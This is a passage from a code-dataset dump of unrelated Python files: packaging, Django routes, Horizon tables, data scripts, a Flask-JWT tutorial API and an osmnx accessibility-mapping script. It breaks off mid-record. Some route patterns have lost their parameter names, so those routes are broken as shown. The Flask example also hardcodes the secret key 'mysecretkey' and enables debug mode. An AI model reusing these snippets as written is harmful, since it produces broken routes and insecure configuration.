"call"}, {"api_name": "nowcast.workers.download_weather.os", "line_number": 613, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather", "line_number": 613, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 615, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 617, "usage_type": "call"}, {"api_name": "nowcast.workers.download_weather.WorkerError", "line_number": 617, "usage_type": "attribute"}, {"api_name": "nowcast.workers.download_weather", "line_number": 617, "usage_type": "name"}, {"api_name": "nowcast.workers.download_weather._get_file", "line_number": 618, "usage_type": "call"}, 
{"api_name": "nowcast.workers.download_weather", "line_number": 618, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 601, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 601, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 538, "usage_type": "call"}]}
+{"seq_id": "318568945", "text": "from setuptools import setup, find_packages\n\nwith open(\"README.md\", 'r', encoding=\"utf-8\") as fh:\n long_description = fh.read()\nwith open(\"requirements.txt\", \"r\", encoding=\"utf-8\") as fh:\n requirements = fh.read()\n\nsetup(\n name=\"jbosscli\",\n version=\"0.0.1\",\n author=\"Sandeep C Kumar\",\n author_email=\"sandeepkchenna@gmail.com\",\n license=\"MIT License\",\n description=\"Jboss EAP 7 CLI Tool\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='',\n py_modules=[\"jbosscli\", \"app\"],\n packages=find_packages(),\n install_requires=[requirements],\n python_requires='>=3.6',\n classifiers=[\n \"Programming Language :: Python :: 3.8\",\n \"Operating System :: OS Independent\",\n ],\n entry_points = \"\"\"\n [console_scripts]\n jbosscli=jbosscli:main\n \"\"\"\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 848, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "setuptools.setup", "line_number": 8, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "608178659", "text": "from django.conf.urls import patterns, url, include\nfrom officespace import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^user/', include('oautherise.urls')),\n url(r'addspaces/$', views.addspace, name=\"addspace\"),\n url(r'info/(?P\\w+)/$', views.officespaceinfo, name='officespaceinfo'),\n url(r'message/(?P\\w+)/$', views.messag, name='messages'),\n url(r'messages/view/$', views.showmessages, name='showmessages'),\n url(r'userprofile/(?P\\w+)/$', views.userprofilename, name='userprofilename'),\n )\n", "sub_path": "officespace/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 619, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "officespace.views.index", "line_number": 5, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "officespace.views.addspace", "line_number": 7, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "officespace.views.officespaceinfo", "line_number": 8, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "officespace.views.messag", "line_number": 9, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "officespace.views.showmessages", "line_number": 10, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "officespace.views.userprofilename", "line_number": 11, "usage_type": "attribute"}, {"api_name": "officespace.views", "line_number": 11, "usage_type": "name"}]}
+{"seq_id": "409918886", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n################################################################################\n# Copyright (c), AiiDA team and individual contributors. #\n# All rights reserved. #\n# This file is part of the AiiDA-wannier90 code. #\n# #\n# The code is hosted on GitHub at https://github.com/aiidateam/aiida-wannier90 #\n# For further information on the license, see the LICENSE.txt file #\n################################################################################\n\nfrom __future__ import absolute_import\nfrom six.moves import zip\n\n__all__ = ('group_list', 'groups_to_string', 'list_to_grouped_string')\n\n\ndef group_list(values):\n values = sorted(values)\n groups = []\n if not values:\n return groups\n current_start = values[0]\n for v1, v2 in zip(values, values[1:]):\n # contiguous range\n if v2 - 1 <= v1:\n continue\n # break in the range\n else:\n groups.append(sorted(set([current_start, v1])))\n current_start = v2\n # final group\n groups.append(sorted(set([current_start, v2]))) # pylint: disable=undefined-loop-variable\n return groups\n\n\ndef groups_to_string(value_groups):\n return ','.join(\n '-'.join([str(g) for g in group]) for group in value_groups\n )\n\n\ndef list_to_grouped_string(values):\n return groups_to_string(group_list(values))\n", "sub_path": "aiida_wannier90/io/_group_list.py", "file_name": "_group_list.py", "file_ext": "py", "file_size_in_byte": 1577, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "six.moves.zip", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "567394034", "text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom django.utils.translation import ugettext_lazy as _ # noqa\n\nfrom horizon import tables\n\nfrom tuskar_ui import api as tuskar\nfrom tuskar_ui import tables as tuskar_tables\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass DeleteFlavorTemplates(tables.DeleteAction):\n data_type_singular = _(\"Flavor Template\")\n data_type_plural = _(\"Flavor Templates\")\n\n def delete(self, request, obj_id):\n tuskar.FlavorTemplate.delete(request, obj_id)\n\n\nclass CreateFlavorTemplate(tables.LinkAction):\n name = \"create\"\n verbose_name = _(\"Create Flavor Template\")\n url = \"horizon:infrastructure:resource_management:flavor_templates:create\"\n classes = (\"ajax-modal\", \"btn-create\")\n\n\nclass EditFlavorTemplate(tables.LinkAction):\n name = \"edit\"\n verbose_name = _(\"Edit Flavor Template\")\n url = \"horizon:infrastructure:resource_management:flavor_templates:edit\"\n classes = (\"ajax-modal\", \"btn-edit\")\n\n\nclass FlavorTemplatesFilterAction(tables.FilterAction):\n\n def filter(self, table, flavor_templates, filter_string):\n \"\"\" Naive case-insensitive search. \"\"\"\n q = filter_string.lower()\n return [flavor_template for flavor_template in flavor_templates\n if q in flavor_template.name.lower()]\n\n\nclass FlavorTemplatesTable(tuskar_tables.DataTable):\n name = tuskar_tables.Column('name',\n link=(\"horizon:infrastructure:\"\n \"resource_management:flavor_templates:detail\"),\n verbose_name=_('Flavor Template Name'))\n cpu = tuskar_tables.Column(\n \"cpu\",\n verbose_name=_('VCPU'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n memory = tuskar_tables.Column(\n \"memory\",\n verbose_name=_('RAM (MB)'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n storage = tuskar_tables.Column(\n \"storage\",\n verbose_name=_('Root Disk (GB)'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n ephemeral_disk = tuskar_tables.Column(\n \"ephemeral_disk\",\n verbose_name=_('Ephemeral Disk (GB)'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n swap_disk = tuskar_tables.Column(\n \"swap_disk\",\n verbose_name=_('Swap Disk (MB)'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n\n class Meta:\n name = \"flavor_templates\"\n verbose_name = _(\"Flavor Templates\")\n table_actions = (CreateFlavorTemplate,\n DeleteFlavorTemplates,\n FlavorTemplatesFilterAction)\n row_actions = (EditFlavorTemplate, DeleteFlavorTemplates)\n", "sub_path": "tuskar_ui/infrastructure/resource_management/flavor_templates/tables.py", "file_name": "tables.py", "file_ext": "py", "file_size_in_byte": 3262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "horizon.tables.DeleteAction", "line_number": 29, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 29, "usage_type": "name"}, 
{"api_name": "django.utils.translation.ugettext_lazy", "line_number": 30, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 31, "usage_type": "call"}, {"api_name": "tuskar_ui.api.FlavorTemplate.delete", "line_number": 34, "usage_type": "call"}, {"api_name": "tuskar_ui.api.FlavorTemplate", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tuskar_ui.api", "line_number": 34, "usage_type": "name"}, {"api_name": "horizon.tables.LinkAction", "line_number": 37, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 37, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 39, "usage_type": "call"}, {"api_name": "horizon.tables.LinkAction", "line_number": 44, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 44, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 46, "usage_type": "call"}, {"api_name": "horizon.tables.FilterAction", "line_number": 51, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 51, "usage_type": "name"}, {"api_name": "tuskar_ui.tables.DataTable", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tuskar_ui.tables", "line_number": 60, "usage_type": "name"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 61, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 64, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 65, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 67, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 70, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 70, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 72, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 75, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 75, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 77, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 80, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 80, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 82, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 85, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 85, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 87, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "111771503", "text": "import argparse\nimport collections\nimport os\nimport re\nimport sys\n\nimport io_io\n\n\ndef merge_split( las_paths_fn,dbname=\"raw_reads\"):\n\n las_paths = io_io.deserialize(las_paths_fn)\n\n re_las_pair = re.compile(r'{db}\\.(\\d+)\\.{db}\\.(\\d+)\\.las$'.format(db=dbname))\n las_map = collections.defaultdict(list)\n for path in las_paths:\n mo = re_las_pair.search(path)\n if not mo:\n msg = '{!r} does not match regex {!r}'.format(\n path, re_las_pair.pattern)\n raise Exception(msg)\n a, b = int(mo.group(1)), int(mo.group(2))\n las_map[a].append(path)\n\n for i, block in enumerate(las_map):\n job_id = 'm_{:05d}'.format(i)\n\n # Write the las files for this job.\n input_dir = os.path.join('merge-scripts', job_id)\n las_paths_fn = os.path.join('.', input_dir, 'las-paths.json')\n io_io.mkdirs(input_dir)\n las_paths = las_map[block]\n io_io.serialize(las_paths_fn, las_paths)\n\ndef parse_args(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--las-fn', required=True,\n help='ignored for now, but non-zero will mean \"No more than this.\"',\n )\n\n\n args = parser.parse_args(argv[1:])\n return args\n\n\ndef main(argv=sys.argv):\n args = parse_args(argv)\n merge_split(args.las_fn)\n # rep_combine(\"a.db\",\"test.json\",3,\"\")\n\n\nif __name__ == \"__main__\":\n main()", "sub_path": "script/merge_daligner_las.py", "file_name": "merge_daligner_las.py", "file_ext": "py", "file_size_in_byte": 1407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "io_io.deserialize", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 14, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "io_io.mkdirs", "line_number": 31, "usage_type": "call"}, {"api_name": "io_io.serialize", "line_number": 33, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 48, "usage_type": "attribute"}]}
+{"seq_id": "104229965", "text": "from pymongo import MongoClient\nimport datetime\n\nmongo = MongoClient()\ndataset = mongo[\"primer\"][\"dataset\"]\ndataset2 = mongo[\"primer2\"][\"dataset\"]\n\nresults = dataset.find()\n\ni = 0\nfor result in results:\n # delta = datetime.timedelta(seconds = int(result[\"attributes\"][\"SCENEDATE\"] / 1000))\n # realdatetime = datetime.datetime(1970, 1, 1, 0, 0, 0) + delta\n # print(result[\"attributes\"][\"METADATAID\"], realdatetime)\n break\n # dataset2.update({\"_id\": result[\"_id\"]}, {\"$set\": {\"dt\": result[\"attributes\"][\"SCENEDATE\"]}})\n i = i + 1\n if i % 10000 == 0:\n print(i, \"done\")\nprint(i)", "sub_path": "updatePrimer2withDateTime.py", "file_name": "updatePrimer2withDateTime.py", "file_ext": "py", "file_size_in_byte": 602, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pymongo.MongoClient", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "8713499", "text": "from flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom secure_check import authenticate,identity\nfrom flask_jwt import JWT ,jwt_required\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'mysecretkey'\napi = Api(app)\n\njwt = JWT(app, authenticate, identity)\n\n# Later on this will be a model call to our database!\n# Right now its just a list of dictionaries\n# puppies = [{'name':'Rufus'},{name:'Frankie'},......]\n# Keep in mind, its in memory, it clears with every restart!\npuppies = []\n\nclass PuppyNames(Resource):\n def get(self,name):\n print(puppies)\n\n # Cycle through list for puppies\n for pup in puppies:\n if pup['name'] == name:\n return pup\n\n # If you request a puppy not yet in the puppies list\n return {'name':None},404\n\n def post(self, name):\n # Add the dictionary to list\n pup = {'name':name}\n puppies.append(pup)\n # Then return it back\n print(puppies)\n return pup\n\n def delete(self,name):\n\n # Cycle through list for puppies\n for ind,pup in enumerate(puppies):\n if pup['name'] == name:\n # don't really need to save this\n delted_pup = puppies.pop(ind)\n return {'note':'delete successful'}\n\n\n\n\nclass AllNames(Resource):\n\n @jwt_required()\n def get(self):\n # return all the puppies :)\n return {'puppies': puppies}\n\n\napi.add_resource(PuppyNames, '/puppy/')\napi.add_resource(AllNames,'/puppies')\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "sub_path": "Flask/09-REST-APIs-with-Flask/02-REST-API-Authorization/auth_api.py", "file_name": "auth_api.py", "file_ext": "py", "file_size_in_byte": 1587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 8, "usage_type": "call"}, {"api_name": "flask_jwt.JWT", "line_number": 10, "usage_type": "call"}, {"api_name": "secure_check.authenticate", "line_number": 10, "usage_type": "argument"}, {"api_name": "secure_check.identity", "line_number": 10, "usage_type": "argument"}, {"api_name": "flask_restful.Resource", "line_number": 18, "usage_type": "name"}, {"api_name": "flask_restful.Resource", "line_number": 50, "usage_type": "name"}, {"api_name": "flask_jwt.jwt_required", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "68300422", "text": "import copy\nimport json\nimport itertools\nfrom correlation import explainable_variance\n\n\nraw_data = json.loads(open('res.json', 'r').read())['finalResult']\n\ntag = ['latency', 'bandwidth', 'nodeCount', 'imageCount',\n 'textCount', 'cssCount', 'cssRuleCount', 'usedCssCount']\n\npredictor = [[] for i in range(len(tag))]\ncriterion = []\n\nfor entry in raw_data:\n for i in range(len(tag)):\n predictor[i].append(entry[tag[i]])\n # criterion.append(max(entry['top5Layout']))\n criterion.append(sum(entry['top5Layout']))\n\n# Dominance Analysis (DA)\n# Given all subset of predictors, if predictor A contributes more than predictor B, then A *completely* dominates B.\n# Predictor's contribution is characterized by the augment of explainable variance.\n\n# Step 1: Generate all subsets of predictors.\ncomplete_set = set(range(len(tag)))\nall_subsets = []\n\nfor i in range(len(tag)-1):\n fix_sized_subsets = itertools.combinations(complete_set, i+1)\n for subset in fix_sized_subsets:\n all_subsets.append(list(subset))\n\n\ndef format_predictor(data, idx):\n sample_size = len(data[0])\n fp = []\n for i in range(sample_size):\n entry = []\n for v in idx:\n entry.append(data[v][i])\n fp.append(entry)\n return fp\n\n\noutput = open('da.txt', 'w')\n\n# Step 2: Calculate predictors' additional contribution (AC).\ndominance_matrix = [[0 for i in range(len(tag))] for i in range(len(tag))]\n\nfor i in range(len(tag)-1):\n for j in range(i+1, len(tag)):\n output.write('Predictor: {}, {}\\n'.format(tag[i], tag[j]))\n\n # First, compare predictors' additional contribution to empty set.\n # Which equals to the explainable variance of the regression on the predictor and criterion alone.\n ac_i = explainable_variance(\n format_predictor(predictor, [i]), criterion)\n ac_j = explainable_variance(\n format_predictor(predictor, [j]), criterion)\n\n output.write('{} {}\\n'.format(ac_i, ac_j))\n if ac_i > ac_j:\n dominance_matrix[i][j] += 1\n elif ac_j > ac_i:\n dominance_matrix[j][i] += 1\n\n # Then, compare predictors' additional contribution across all non-empty sets that they are not included.\n # The ordering of predictors are not considered yet.\n for subset in all_subsets:\n if (not i in subset) and (not j in subset):\n original = explainable_variance(\n format_predictor(predictor, subset), criterion)\n\n ss = copy.deepcopy(subset)\n ss.append(i)\n ac_i = explainable_variance(\n format_predictor(predictor, ss), criterion)\n\n ss = copy.deepcopy(subset)\n ss.append(j)\n ac_j = explainable_variance(\n format_predictor(predictor, ss), criterion)\n\n output.write('{} {} {}\\n'.format(original, ac_i, ac_j))\n\n if ac_i > ac_j:\n dominance_matrix[i][j] += 1\n elif ac_j > ac_i:\n dominance_matrix[j][i] += 1\n\n output.write('\\n')\n\nac = explainable_variance(format_predictor(\n predictor, range(len(tag))), criterion)\nprint(ac)\n\nfor i in range(len(tag)-1):\n for j in range(i+1, len(tag)):\n v1 = dominance_matrix[i][j]\n v2 = dominance_matrix[j][i]\n\n prop = v1 / (v1+v2)\n if prop >= 0.5:\n print('{} {} {:.2f}'.format(tag[i], tag[j], prop))\n else:\n print('{} {} {:.2f}'.format(tag[j], tag[i], 1-prop))\n", "sub_path": "layout/src/v0/dominance_analysis.py", "file_name": "dominance_analysis.py", "file_ext": "py", "file_size_in_byte": 3553, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "json.loads", "line_number": 7, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 30, "usage_type": 
"call"}, {"api_name": "correlation.explainable_variance", "line_number": 57, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 59, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 72, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 75, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 77, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 80, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 82, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 94, "usage_type": "call"}]}
+{"seq_id": "443579970", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n\nInspired by the example described in \nhttps://towardsdatascience.com/measuring-pedestrian-accessibility-97900f9e4d56\n\nChunks of code taken from \nhttp://kuanbutts.com/2017/08/08/how-to-pdna/\n\nBeware: multiple bugs needed to be sorted out in order to install all the necessary libraries\n\nCreated on Sat Dec 29 22:17:24 2018\n\n@author: Les\n\"\"\"\n\nprint(\"\\nLoading libraries\")\nimport os \nos.environ[\"PROJ_LIB\"] = \"C:\\\\Users\\\\Bonny\\\\Anaconda3\\\\Lib\\\\site-packages\\\\pyproj\\\\data\"\nimport pandas as pd\nfrom copy import copy\n#import mpl_toolkits\n#mpl_toolkits.__path__.append(\"C:\\\\Users\\\\Bonny\\\\Anaconda3\\\\Lib\\\\site-packages\\\\mpl_toolkits\")\nfrom mpl_toolkits.basemap import Basemap ### needs basemap lib: conda install -c conda-forge basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom mpl_toolkits.axes_grid1.colorbar import colorbar\nimport matplotlib.pyplot as plt\n\nimport osmnx as ox\nimport pandana as pdna\nfrom pandana.loaders import osm\n\nfrom shapely.geometry import Point, Polygon, MultiPolygon\nfrom descartes import PolygonPatch\n\nfrom accessibility_helpers import *\n\n\n\nmelbourne_bbox = {'south':-37.83, 'west':144.855 ,'north':-37.73, 'east':145.010}\nmelbourne_house_poi = Point( 144.97766, -37.75807) # our house, Lincoln Street\n\ntorino_bbox = {'south':45.005, 'west':7.578 ,'north':45.140, 'east':7.773}\ntorino_house_poi = Point(7.6486667, 45.0656553) # Dario's house\n#torino_bbox = {'south':44.85, 'west':7.6118697 ,'north':45.25, 'east':7.6973155}\n\ncity_name = 'Torino'\nmax_dist = 3000 #CONSIDER ONLY AMENITIES WITHIN THIS DISTANCE (IN METERS)\nmax_pois = 3 #consider a max number of points of interest (always within the max distance)\n\n\nif city_name=='Torino':\n bbox = torino_bbox\n house_poi = torino_house_poi\nelif city_name=='Melbourne':\n bbox = melbourne_bbox\n house_poi = melbourne_house_poi\nelse:\n raise ValueError('Invalid city name {}'.format(city_name))\n\n\n### EXTRACT OPENSOURCEMAP NETWORK INFORMATION\nprint(\"\\nExtracting OpenSourceMap network info with osmnx\")\n### Use the osmnx library; full documents and examples at\n### https://github.com/gboeing/osmnx\n\n### one can select specifiic areas...\n#places = ['Melbourne, Victoria, Australia', 'Carlton, Victoria, Australia', \n# 'North Melbourne, Victoria, Australia', 'Parkville, Victoria, Australia',\n# 'Brunswick, Victoria, Australia', 'Brunswick East, Victoria, Australia', \n# 'Brunswick West, Victoria, Australia', 'Fitzroy, Victoria, Australia', \n# 'Fitzroy North, Victoria, Australia','Richmond, Victoria, Australia' ]\n#\n#G = ox.graph_from_place(places, network_type='drive')#distance=2000, distance_type='bbox')\n\n### ...or pick everything within a certain radius...\n#network_centre_coords = ( -37.813, 144.944) # Melbourne\n#network_radius = 7000 # in meters\n#G = ox.graph_from_point(network_centre_coords, distance=network_radius, network_type='drive')\n\n### or pass directly a bounding box of lat/lon coordinates\n\nG = ox.graph_from_bbox(bbox['north'], bbox['south'], bbox['east'], bbox['west'], network_type='drive')\n\n\n### import also the boundaries of the city\n# get the place shape\ngdf_string = \"\"\nif city_name=='Melbourne':\n gdf_string = \"Melbourne, Victoria, Australia\"\nif city_name=='Torino':\n gdf_string = \"Torino, Italy\"\n \ngdf = ox.gdf_from_place(gdf_string)\n\n###the output G is a networkx multidigraph; can be plotted easily\nprint(\"\\nPlotting 
network\")\n#nodes = G.nodes\n#edges = G.edges\nfig_height=20\nw_over_h = (bbox['east'] - bbox['west']) / (bbox['north'] - bbox['south']) \nplt.ion()\nfig, ax = ox.plot_graph(G, fig_height=fig_height, fig_width=fig_height*w_over_h, node_size=0, show=False, close=False)\n\n# to this matplotlib axis, add the place shape as descartes polygon patches\nfor geometry in gdf['geometry'].tolist():\n if isinstance(geometry, (Polygon, MultiPolygon)):\n if isinstance(geometry, Polygon):\n geometry = MultiPolygon([geometry])\n for polygon in geometry:\n patch = PolygonPatch(polygon, fc='white', ec='royalblue', linewidth=2, alpha=1, zorder=-1)\n ax.add_patch(patch)\n\n# optionally set up the axes extents all nicely\nmargin = 0.02\ngdf_west, gdf_south, gdf_east, gdf_north = gdf.unary_union.bounds\nmargin_ns = (gdf_north - gdf_south) * margin\nmargin_ew = (gdf_east - gdf_west) * margin\nax.set_ylim((gdf_south - margin_ns, gdf_north + margin_ns))\nax.set_xlim((gdf_west - margin_ew, gdf_east + margin_ew))\n\n#add a red marker for our house\nhouse_patch = PolygonPatch(house_poi.buffer(0.001), fc='red', ec='red', linewidth=3,alpha=1, zorder=1)\nax.add_patch(house_patch)\nax.set_aspect(1)\nfig.savefig('./{}_fig01.png'.format(city_name), bbox_inches='tight')\nplt.gcf().clear()\n\n### extract the nodes and edges from the OSMNX object anc cast them into pandas dataframes\n### The pd df will be then imported into pandana objects\n\n\n\nprint(\"\\nImporting edges into a df\")\nedges_df = create_edges_df(G)\nprint(\"\\nImporting nodes into a df\")\nnodes_df = create_nodes_df(G)\n\n\n# Instantiate a Pandana (pdna) network (net)\nprint(\"\\nCreating pandana network\")\nnet = pdna.Network(nodes_df['x'], nodes_df['y'],\n edges_df['st_node'], edges_df['en_node'],\n edges_df[['weight']])\n\nnet.precompute(max_dist*1.1)\n\n### Now we download the location of interesting amenities via the pandana library\n### We will then overlap them onto the network we have just downloaded above and\n### compute the distances\n\n### define your selected amenities and bounding box\n### full list of amenities: https://wiki.openstreetmap.org/wiki/Map_Features#Amenity\namenities = ['hospital', 'clinic', 'doctors', 'pharmacy', 'dentist', 'school', 'police', 'swimming_pool']# \namenities2 = ['restaurant','cafe','bank','park']\n\n# request them from the OpenStreetMap API (Overpass)\nprint(\"\\nImporting list of Points Of Interest\")\n#all_pois = osm.node_query(bbox['south'], bbox['west'], bbox['north'], bbox['east'])#,tags=\"amenity\")\nall_pois= pd.read_pickle('./{city}_POIs_nodes-and-ways_amenities-only.pkl'.format(city=city_name))\npois = all_pois[all_pois['amenity'].isin(amenities)]\n\nprint(\"\\nComputing accessibility for the closest {} POIs within {} meters\".format(max_pois, max_dist))\nfor amenity in amenities:\n pois_subset = pois.loc[pois['amenity']==amenity , ]\n net.set_pois(category=amenity, maxdist=max_dist, maxitems=max_pois, x_col=pois_subset['lon'], y_col=pois_subset['lat'])\n#### end for loop\n \n### \nn1 = net.nearest_pois(max_dist, amenities[0], num_pois=max_pois, include_poi_ids=True)\nprint(\"\\n***************\")\nprint(n1.describe())\nprint(\"\\n***************\\n\")\n \nfig_size=( fig_height*w_over_h*1.15,fig_height)#add some buffer for the side colorbar\n#if city_name=='Torino':\n# fig_size=(8,10)\n \nfor amenity in amenities:\n print(\"\\nPlotting {}\".format(amenity))\n house_patch2 = PolygonPatch(house_poi.buffer(0.001), fc='red', ec='red', linewidth=3,alpha=1, zorder=1)\n patches = [house_patch2]\n sel_pois = 
pois.loc[pois['amenity']==amenity, ['amenity','name','lat','lon']]\n for i in range(0,sel_pois.shape[0],1):\n tmp_poi = Point( (sel_pois['lon'].values)[i], (sel_pois['lat'].values)[i])\n patches.append(PolygonPatch(tmp_poi.buffer(0.001), fc='purple', ec='purple', linewidth=3,alpha=1, zorder=1) )\n \n bm, fig, ax = plot_nearest_amenity(net, amenity, 1, list(bbox.values()), max_dist, max_pois, city_name=city_name, \n plot_type='hex', patches=patches, fig_size=fig_size)\n \n # to this matplotlib axis, add the place shape as descartes polygon patches\n for geometry in gdf['geometry'].tolist():\n if isinstance(geometry, (Polygon, MultiPolygon)):\n if isinstance(geometry, Polygon):\n geometry = MultiPolygon([geometry])\n for polygon in geometry:\n patch = PolygonPatch(polygon, fill=False, ec='yellow', linewidth=4, alpha=1, zorder=1)\n ax.add_patch(patch)\n\n #ax.add_patch(house_patch2)\n fig.savefig('./{}_accessibility_{}_hex.png'.format( city_name,amenity), bbox_anchor='tight')\n plt.gcf().clear()\n\n####now same but in scatter plot format\n bmB, figB, axB = plot_nearest_amenity(net, amenity, 1, list(bbox.values()), max_dist, max_pois, city_name=city_name, \n plot_type='scatter', patches=patches, fig_size=fig_size)\n \n # to this matplotlib axis, add the place shape as descartes polygon patches\n for geometry in gdf['geometry'].tolist():\n if isinstance(geometry, (Polygon, MultiPolygon)):\n if isinstance(geometry, Polygon):\n geometry = MultiPolygon([geometry])\n for polygon in geometry:\n patch = PolygonPatch(polygon, fill=False, ec='yellow', linewidth=4, alpha=1, zorder=1)\n axB.add_patch(patch)\n\n #ax.add_patch(house_patch2)\n figB.savefig('./{}_accessibility_{}_scatter.png'.format( city_name,amenity), 